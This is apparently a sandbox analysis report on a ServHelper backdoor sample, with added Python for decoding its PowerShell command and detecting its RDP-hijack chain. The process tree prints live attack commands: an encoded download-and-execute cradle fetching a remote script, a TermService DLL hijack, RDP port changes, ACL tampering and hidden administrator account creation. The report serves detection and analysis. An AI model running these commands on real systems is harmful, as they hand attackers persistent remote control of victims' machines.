Resubmissions
02-09-2021 16:57  210902-vgpzjadhhn  score 10
02-09-2021 16:25  210902-tw1h5sage4  score 10
02-09-2021 11:31  210902-9dk89x9wb2  score 10
14-08-2021 13:56  210814-xdxpv1yk2x  score 10
Analysis
- max time kernel: 1750s
- max time network: 1772s
- platform: windows7_x64
- resource: win7-en
- submitted: 02-09-2021 16:25
Static task: static1
Behavioral task: behavioral1 (sample 472208d7ba18d4c14b7e90b9db5d6feb.exe, resource win7-en; the behaviour reported below comes from this task)
Behavioral task: behavioral2 (sample 472208d7ba18d4c14b7e90b9db5d6feb.exe, resource win10v20210408)
General
- Target: 472208d7ba18d4c14b7e90b9db5d6feb.exe
- Size: 5.9MB
- MD5: 472208d7ba18d4c14b7e90b9db5d6feb
- SHA1: ff24cc43998ff99e61b1a838e1d51c4888498935
- SHA256: ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
- SHA512: 9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
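The URL above is what the `-enc` argument of the PowerShell command in the process tree decodes to. The following Python is an added example, not part of the sandbox report or of the malware: it decodes a PowerShell -EncodedCommand argument (Base64 over UTF-16LE), pads it if a log dropped the trailing '=', pulls out any URLs and flags the IEX-plus-download cradle pattern. ENCODED is the Base64 string copied from the process tree; CMDLINE reproduces the recorded command line; the function names and the regexes are my own.

```python
"""Decode a PowerShell -EncodedCommand argument and recover the URL it fetches.

Added example, not part of the sandbox report or of the malware. ENCODED is the -enc
argument copied from the process tree; CMDLINE reproduces the recorded command line.
"""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
# -ep / -ex are ExecutionPolicy, so only "-e" alone or "-e" followed by c / n... is accepted.
ENC_SWITCH = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.I)
URL = re.compile(r"https?://[^\s\"'()<>]+", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded script for a -enc command line, or None if it has no -enc switch."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)            # tolerate logs that dropped the trailing '='
    return base64.b64decode(b64).decode("utf-16-le")   # -enc is Base64 over UTF-16LE


def extract_urls(script):
    """Every http(s) URL literal in the decoded script."""
    return URL.findall(script)


def is_download_cradle(script):
    """IEX / Invoke-Expression fed by a web download, the pattern seen in this report."""
    s = script.lower()
    runs_text = "iex" in s or "invoke-expression" in s
    fetches = "downloadstring" in s or "webclient" in s or "invoke-webrequest" in s
    return runs_text and fetches


# Base64 argument copied from the process tree (split only for readability)
ENCODED = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMA"
    "bABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgA"
    "dAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4A"
    "dABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8A"
    "bQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"
)
CMDLINE = ("powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc "
           + ENCODED)

if __name__ == "__main__":
    script = decode_encoded_command(CMDLINE)
    print(script)
    print("urls:", extract_urls(script), "cradle:", is_download_cradle(script))
```

The switch regex deliberately does not treat `-ep bypass` as an encoded command: PowerShell resolves `-ep` to -ExecutionPolicy, and `bypass` happens to be valid Base64, so a looser pattern produces garbage decodes on exactly the command lines this sample uses.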
Signatures
- ServHelper
  ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (2 IoCs)
  flow 11  PID 1176  powershell.exe
  flow 12  PID 1176  powershell.exe
- Modifies RDP port number used by Windows (1 TTP)
- Possible privilege escalation attempt (8 IoCs)
  PID 1352 icacls.exe, PID 1324 icacls.exe, PID 320 icacls.exe, PID 1584 takeown.exe, PID 1676 icacls.exe, PID 1964 icacls.exe, PID 1396 icacls.exe, PID 844 icacls.exe
- Sets DLL path for service in the registry (2 TTPs)
- YARA rule `upx` matched on dropped resources
  \Windows\Branding\mediasrv.png
  \Windows\Branding\mediasvc.png
- Loads dropped DLL (2 IoCs)
  PID 844 (2 entries; no process name recorded)
- Modifies file permissions (1 TTP, 8 IoCs)
  PID 1584 takeown.exe, PID 1676 icacls.exe, PID 1964 icacls.exe, PID 1396 icacls.exe, PID 844 icacls.exe, PID 1352 icacls.exe, PID 1324 icacls.exe, PID 320 icacls.exe
- Drops file in System32 directory (1 IoC)
  File created                  C:\Windows\system32\rfxvmt.dll  powershell.exe
- Drops file in Windows directory (9 IoCs)
  File created                  C:\Windows\branding\wupsvc.jpg  powershell.exe
  File opened for modification  C:\Windows\branding\ShellBrd  powershell.exe
  File opened for modification  C:\Windows\branding\wupsvc.jpg  powershell.exe
  File created                  C:\Windows\branding\mediasvc.png  powershell.exe
  File opened for modification  C:\Windows\branding\Basebrd  powershell.exe
  File opened for modification  C:\Windows\branding\mediasrv.png  powershell.exe
  File opened for modification  C:\Windows\branding\mediasvc.png  powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KB6Y95K1TRVJZ3LP0BBS.temp  powershell.exe
  File created                  C:\Windows\branding\mediasrv.png  powershell.exe
- Modifies data under HKEY_USERS (4 IoCs)
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  WMIC.exe
  Key created       \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  WMIC.exe
  Key created       \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage  powershell.exe
  Set value (data)  \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b0a4dfb417a0d701  powershell.exe
  (S-1-5-20 is the SID of NT AUTHORITY\NETWORK SERVICE, so these WMIC and PowerShell instances ran under the service account, not the Admin user.)
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  PIDs 588, 560, 1160, 792, 588, 588, 588, 1176 (all powershell.exe)
- Suspicious behavior: LoadsDriver (59 IoCs)
  PID 464 (1 entry) and PID 844 (the remaining 58 entries); no process name is recorded for these entries.
  Caveat: PID 844 also appears as icacls.exe in the process tree, and this run reuses PIDs freely (936, 1584, 1676, 1192, 1812, 1396, 1600, 780 and 1092 each belong to two different processes), so match sandbox IoCs on process name and time rather than on PID alone.
- Suspicious use of AdjustPrivilegeToken (19 IoCs)
  SeDebugPrivilege               PID 1996  472208d7ba18d4c14b7e90b9db5d6feb.exe
  SeDebugPrivilege               PID 588   powershell.exe
  SeDebugPrivilege               PID 560   powershell.exe
  SeDebugPrivilege               PID 1160  powershell.exe
  SeDebugPrivilege               PID 792   powershell.exe
  SeRestorePrivilege             PID 1964  icacls.exe
  SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeAuditPrivilege (each twice)  PID 1724  WMIC.exe
  SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeAuditPrivilege (each twice)  PID 1188  WMIC.exe
  SeDebugPrivilege               PID 1176  powershell.exe
- Suspicious use of WriteProcessMemory (64 IoCs; the sandbox records three writes per child process spawn)
  PID 1996 472208d7ba18d4c14b7e90b9db5d6feb.exe -> PID 588 powershell.exe  (x3)
  PID 588 powershell.exe -> PID 1056 csc.exe  (x3)
  PID 1056 csc.exe -> PID 936 cvtres.exe  (x3)
  PID 588 powershell.exe -> PID 560 powershell.exe  (x3)
  PID 588 powershell.exe -> PID 1160 powershell.exe  (x3)
  PID 588 powershell.exe -> PID 792 powershell.exe  (x3)
  PID 588 powershell.exe -> PID 1584 takeown.exe  (x3)
  PID 588 powershell.exe -> PID 1676 icacls.exe  (x3)
  PID 588 powershell.exe -> PID 1964 icacls.exe  (x3)
  PID 588 powershell.exe -> PID 1396 icacls.exe  (x3)
  PID 588 powershell.exe -> PID 844 icacls.exe  (x3)
  PID 588 powershell.exe -> PID 1352 icacls.exe  (x3)
  PID 588 powershell.exe -> PID 1324 icacls.exe  (x3)
  PID 588 powershell.exe -> PID 320 icacls.exe  (x3)
  PID 588 powershell.exe -> PID 1516 reg.exe  (x3)
  PID 588 powershell.exe -> PID 1636 reg.exe  (x3)
  PID 588 powershell.exe -> PID 1600 reg.exe  (x3)
  PID 588 powershell.exe -> PID 1812 net.exe  (x3)
  PID 1812 net.exe -> PID 936 net1.exe  (x3)
  PID 588 powershell.exe -> PID 1580 cmd.exe  (x3)
  PID 1580 cmd.exe -> PID 1192 cmd.exe  (x3)
  PID 1192 cmd.exe -> PID 1684 net.exe  (x1)
Processes
Indentation follows the parent/child depth the sandbox recorded ([n] = depth). The depth-1 cmd.exe chains after the sample's own tree are separate roots, not children of 472208d7ba18d4c14b7e90b9db5d6feb.exe. PIDs are reused within the run (936, 1584, 1676, 1192, 1812, 1396, 1600, 780 and 1092 each appear for two different processes).

[1] PID 1996  C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] PID 588  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] PID 1056  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        cmd: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zzulzwbo.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] PID 936  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
          cmd: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1047.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1046.tmp"
    [3] PID 560  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] PID 1160  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] PID 792  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    [3] PID 1584  C:\Windows\system32\takeown.exe
        cmd: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] PID 1676  C:\Windows\system32\icacls.exe
        cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] PID 1964  C:\Windows\system32\icacls.exe
        cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [3] PID 1396  C:\Windows\system32\icacls.exe
        cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] PID 844  C:\Windows\system32\icacls.exe
        cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] PID 1352  C:\Windows\system32\icacls.exe
        cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] PID 1324  C:\Windows\system32\icacls.exe
        cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] PID 320  C:\Windows\system32\icacls.exe
        cmd: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] PID 1516  C:\Windows\system32\reg.exe
        cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    [3] PID 1636  C:\Windows\system32\reg.exe
        cmd: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies registry key
    [3] PID 1600  C:\Windows\system32\reg.exe
        cmd: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] PID 1812  C:\Windows\system32\net.exe
        cmd: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
      [4] PID 936  C:\Windows\system32\net1.exe
          cmd: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] PID 1580  C:\Windows\system32\cmd.exe
        cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
      [4] PID 1192  C:\Windows\system32\cmd.exe
          cmd: cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
        [5] PID 1684  C:\Windows\system32\net.exe
            cmd: net start rdpdr
          [6] PID 1584  C:\Windows\system32\net1.exe
              cmd: C:\Windows\system32\net1 start rdpdr
    [3] PID 1676  C:\Windows\system32\cmd.exe
        cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      [4] PID 1092  C:\Windows\system32\cmd.exe
          cmd: cmd /c net start TermService
        [5] PID 1956  C:\Windows\system32\net.exe
            cmd: net start TermService
          [6] PID 1380  C:\Windows\system32\net1.exe
              cmd: C:\Windows\system32\net1 start TermService
    [3] PID 1092  C:\Windows\system32\cmd.exe
        cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] PID 780  C:\Windows\system32\cmd.exe
        cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

[1] PID 316  C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe user WgaUtilAcc 000000 /del
  [2] PID 1700  C:\Windows\system32\net.exe
      cmd: net.exe user WgaUtilAcc 000000 /del
    [3] PID 1600  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

[1] PID 2012  C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe user WgaUtilAcc iBs6lfst /add
  [2] PID 1812  C:\Windows\system32\net.exe
      cmd: net.exe user WgaUtilAcc iBs6lfst /add
    [3] PID 1696  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 user WgaUtilAcc iBs6lfst /add

[1] PID 1192  C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  [2] PID 1708  C:\Windows\system32\net.exe
      cmd: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    [3] PID 780  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

[1] PID 880  C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" KJUCCLUP$ /ADD
  [2] PID 676  C:\Windows\system32\net.exe
      cmd: net.exe LOCALGROUP "Remote Desktop Users" KJUCCLUP$ /ADD
    [3] PID 1704  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" KJUCCLUP$ /ADD

[1] PID 1360  C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  [2] PID 1776  C:\Windows\system32\net.exe
      cmd: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    [3] PID 1628  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

[1] PID 936  C:\Windows\System32\cmd.exe
    cmd: cmd /C net.exe user WgaUtilAcc iBs6lfst
  [2] PID 1524  C:\Windows\system32\net.exe
      cmd: net.exe user WgaUtilAcc iBs6lfst
    [3] PID 456  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 user WgaUtilAcc iBs6lfst

[1] PID 676  C:\Windows\System32\cmd.exe
    cmd: cmd.exe /C wmic path win32_VideoController get name
  [2] PID 1724  C:\Windows\System32\Wbem\WMIC.exe
      cmd: wmic path win32_VideoController get name
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken

[1] PID 1696  C:\Windows\System32\cmd.exe
    cmd: cmd.exe /C wmic CPU get NAME
  [2] PID 1188  C:\Windows\System32\Wbem\WMIC.exe
      cmd: wmic CPU get NAME
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken

In the next three entries <ENC> stands for the Base64 argument
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
which is Base64 over UTF-16LE and decodes to:
IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1")
(the URL listed under Malware Config).

[1] PID 1396  C:\Windows\System32\cmd.exe
    cmd: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc <ENC>
  [2] PID 1812  C:\Windows\system32\cmd.exe
      cmd: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc <ENC>
    [3] PID 1176  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmd: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc <ENC>
        - Blocklisted process makes network request
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

[1] PID 1692  C:\Windows\System32\cmd.exe
    cmd: cmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes
  [2] PID 1168  C:\Windows\system32\net.exe
      cmd: net user wgautilacc 111213
    [3] PID 2004  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 user wgautilacc 111213
  [2] PID 2036  C:\Windows\system32\net.exe
      cmd: net user wgautilacc /active:yes
    [3] PID 912  C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 user wgautilacc /active:yes

What the tree shows, read from the entries above:
- The first stage (ready.ps1 in PID 588) drops rfxvmt.dll into System32 and rewrites its ACL to match a Microsoft-owned System32 binary: inheritance removed, owner NT SERVICE\TrustedInstaller with Full control, SYSTEM and BUILTIN\Administrators cut back to RX. The file then looks like a stock Windows component to anyone inspecting permissions.
- TermService is repointed at C:\Windows\branding\mediasrv.png (ServiceDLL; a DLL carrying an image extension and one of the two files the `upx` YARA rule matched), the RDP listener is moved from 3389 to 0x1C21 = 7201/tcp, fEnableWddmDriver is set to 0, and rdpdr and TermService are started.
- NT AUTHORITY\NETWORK SERVICE, the account TermService runs as, is added to Administrators.
- The separate depth-1 cmd.exe roots create the local user WgaUtilAcc (password first iBs6lfst, then 111213, then /active:yes), add it and the computer account KJUCCLUP$ to Remote Desktop Users, add WgaUtilAcc to Administrators, fingerprint the host with WMIC (video controller and CPU name), and run the encoded download cradle. Their registry writes land under HKEY_USERS\S-1-5-20, the NETWORK SERVICE SID, which is consistent with these processes being spawned by the hijacked service rather than by the Admin user's session.
- The first stage deletes %temp%\*.ps1 and %temp%\*.txt, so ready.ps1 should not be expected to survive on disk; the TermService ServiceDLL value, the RDP-Tcp PortNumber, the WgaUtilAcc account and the Administrators membership of NETWORK SERVICE are the durable artifacts.
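A detection pass over the command lines above, as an added example (not the sandbox's code and not the malware's): EVENTS is constructed from the process tree, with PIDs, images and command lines as recorded plus one constructed benign `reg query` as a control; the event field names (pid, ppid, image, cmdline) are an assumed Sysmon-style shape. Each rule flags one piece of the chain (service-DLL replacement for TermService, RDP port change, group/user additions, ACL changes on a DLL), and the verdict reports the full RDP backdoor only when a hijacked service and a port change coincide with new remote-access accounts.

```python
"""Flag the RDP-hijack chain from Windows process-creation events.

Added example, not part of the sandbox report or of the malware. EVENTS is constructed
from the command lines in the process tree above (PIDs and images as recorded); the
event shape (pid, ppid, image, cmdline) is an assumed Sysmon-style record.
"""
import re

EVENTS = [
    {"pid": 1516, "ppid": 588, "image": r"C:\Windows\system32\reg.exe",
     "cmdline": r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f'},
    {"pid": 1636, "ppid": 588, "image": r"C:\Windows\system32\reg.exe",
     "cmdline": r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f'},
    {"pid": 936, "ppid": 1812, "image": r"C:\Windows\system32\net1.exe",
     "cmdline": r'C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add'},
    {"pid": 1696, "ppid": 1812, "image": r"C:\Windows\system32\net1.exe",
     "cmdline": r"C:\Windows\system32\net1 user WgaUtilAcc iBs6lfst /add"},
    {"pid": 780, "ppid": 1708, "image": r"C:\Windows\system32\net1.exe",
     "cmdline": r'C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD'},
    {"pid": 1628, "ppid": 1776, "image": r"C:\Windows\system32\net1.exe",
     "cmdline": r'C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD'},
    {"pid": 1964, "ppid": 588, "image": r"C:\Windows\system32\icacls.exe",
     "cmdline": r'"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"'},
    # constructed benign control: reading the RDP port must not fire any rule
    {"pid": 4242, "ppid": 1, "image": r"C:\Windows\system32\reg.exe",
     "cmdline": r'reg query "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber'},
]

TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokens(cmdline):
    """Split a Windows command line, keeping quoted arguments as single tokens."""
    return [quoted if quoted else bare for quoted, bare in TOKEN.findall(cmdline)]


def arg_after(low, toks, flag):
    """Value following a switch such as /v or /d (original case), or '' if absent."""
    if flag in low and low.index(flag) + 1 < len(toks):
        return toks[low.index(flag) + 1]
    return ""


def classify(ev):
    """Return (rule, detail) pairs that one process-creation event triggers."""
    toks = tokens(ev["cmdline"])
    low = [t.lower() for t in toks]
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    hits = []
    if image == "reg.exe" and len(low) > 2 and low[1] == "add":
        key, value = low[2], arg_after(low, toks, "/v").lower()
        data = arg_after(low, toks, "/d")
        # TermService loading anything but termsrv.dll is a service-DLL hijack
        if (key.endswith(r"\services\termservice\parameters") and value == "servicedll"
                and not data.lower().endswith("termsrv.dll")):
            hits.append(("termservice_servicedll_replaced", data))
        if key.endswith(r"\winstations\rdp-tcp") and value == "portnumber":
            try:
                data = str(int(data, 0))          # reg.exe accepts 0x1C21 as well as 7201
            except ValueError:
                pass
            hits.append(("rdp_port_changed", data))
    if image in ("net.exe", "net1.exe") and "/add" in low:
        if "localgroup" in low and len(low) > low.index("localgroup") + 2:
            i = low.index("localgroup")
            group, member = low[i + 1], toks[i + 2]
            if group == "administrators":
                hits.append(("admin_group_member_added", member))
            elif group == "remote desktop users":
                hits.append(("rdp_group_member_added", member))
        elif "user" in low and len(low) > low.index("user") + 1:
            hits.append(("local_user_created", toks[low.index("user") + 1]))
    if image in ("icacls.exe", "takeown.exe"):
        for t in toks:
            if t.lower().endswith(".dll"):
                hits.append(("dll_acl_tampered", t))
                break
    return hits


def assess(events):
    """Aggregate per-event hits and decide whether the whole RDP-backdoor chain is present."""
    findings = {}
    for ev in events:
        for rule, detail in classify(ev):
            findings.setdefault(rule, []).append((ev["pid"], detail))
    hijack = {"termservice_servicedll_replaced", "rdp_port_changed"} <= set(findings)
    access = {"local_user_created", "rdp_group_member_added", "admin_group_member_added"} & set(findings)
    if hijack and access:
        verdict = "rdp_backdoor_chain"
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return verdict, findings


if __name__ == "__main__":
    verdict, findings = assess(EVENTS)
    print(verdict)
    for rule, items in findings.items():
        print(f"  {rule}: {items}")
```

The rules key on the resolved image name and on tokenized arguments rather than on substrings of the raw line, so the quoted group name "Remote Desktop Users" and the case variations (ADD/add, LOCALGROUP/localgroup) in the tree are handled the way net.exe and reg.exe themselves handle them. The termsrv.dll exception is what keeps a legitimate repair of the service value from firing.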
Network
MITRE ATT&CK Enterprise v6
Downloads
(file paths are only recorded for some entries)
- (path not recorded)
  MD5     c07edee87321506129963d52adf00691
  SHA1    852a61e06d9781be17f7859e0fcaedaa6890046f
  SHA256  bfdccf4d9fe83ebebf5fb9cade82cefd977caa61594e7718f83f1ab7eb7b23d6
  SHA512  144cffc7d5db2f3fe4591b1089e33ffeaaf58f3854c855e0c8770e28acb098cf092fe7d417640316cd2039f4361beff3b55fd703c87ff289061ed09300e2803e
- (path not recorded)
  MD5     3447df88de7128bdc34942334b2fab98
  SHA1    519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
  SHA256  9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
  SHA512  2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
- (path not recorded)
  MD5     00fb904b2dd958760943b89400e9b7f9
  SHA1    8c825862b6f70cbaef991525f31100f713e61e7d
  SHA256  392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a
  SHA512  ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a
- (path not recorded)
  MD5     fc1fcea0e377f949ca523347a5489a06
  SHA1    36fd47bac965a954fdd2a33133c1db4171b50d27
  SHA256  5f1a684fece7d66b11664497d19048947b8eacfbdb5cbaa44577ffeae500daad
  SHA512  60385ab361e3c359954897100050327a480e09d41e0a4113ad4f8b020b049a3b8f018451ec67640b72261b35e0c7a9b89a92b09955dde0132b3561f761a5a15c
- (path not recorded)
  MD5     6c46f8fcebd944e2bec33c0fc73af629
  SHA1    419a7f6fe49d69500e11df17a565dcc961723fcf
  SHA256  b5d600eb0b73bd27e7cb7cb9149717ee989037036cc229cbf95e36d17f5592a7
  SHA512  4a5d2046beb96c53e6a10da4ac0fdaa5e7be2d2f0f003f6d6081a86323a09a61ecd7fe24dabe9691144c110b0d37cb0904597141089634df2c6a0b48418bc5f7
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (listed three times with identical hashes)
  MD5     7870e7807fd0aa185ee82df60bcc0c92
  SHA1    b82913e640f225175720a885dd3e0f020c3b5cb9
  SHA256  57c5bab0dc0258bc54b73d032dd83dbbb82a8cf6bc2b0ea0588011518e08e166
  SHA512  9829c8bb325e56cc2be7eac7a5898890474ff02b79ddce4d82376b09c4f0a833cffd4a2f98d142821e1ce909b4d752b2bf561480d8cbfa02cf8c4394f580eae9
- (path not recorded)
  MD5     dc39d23e4c0e681fad7a3e1342a2843c
  SHA1    58fd7d50c2dca464a128f5e0435d6f0515e62073
  SHA256  6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
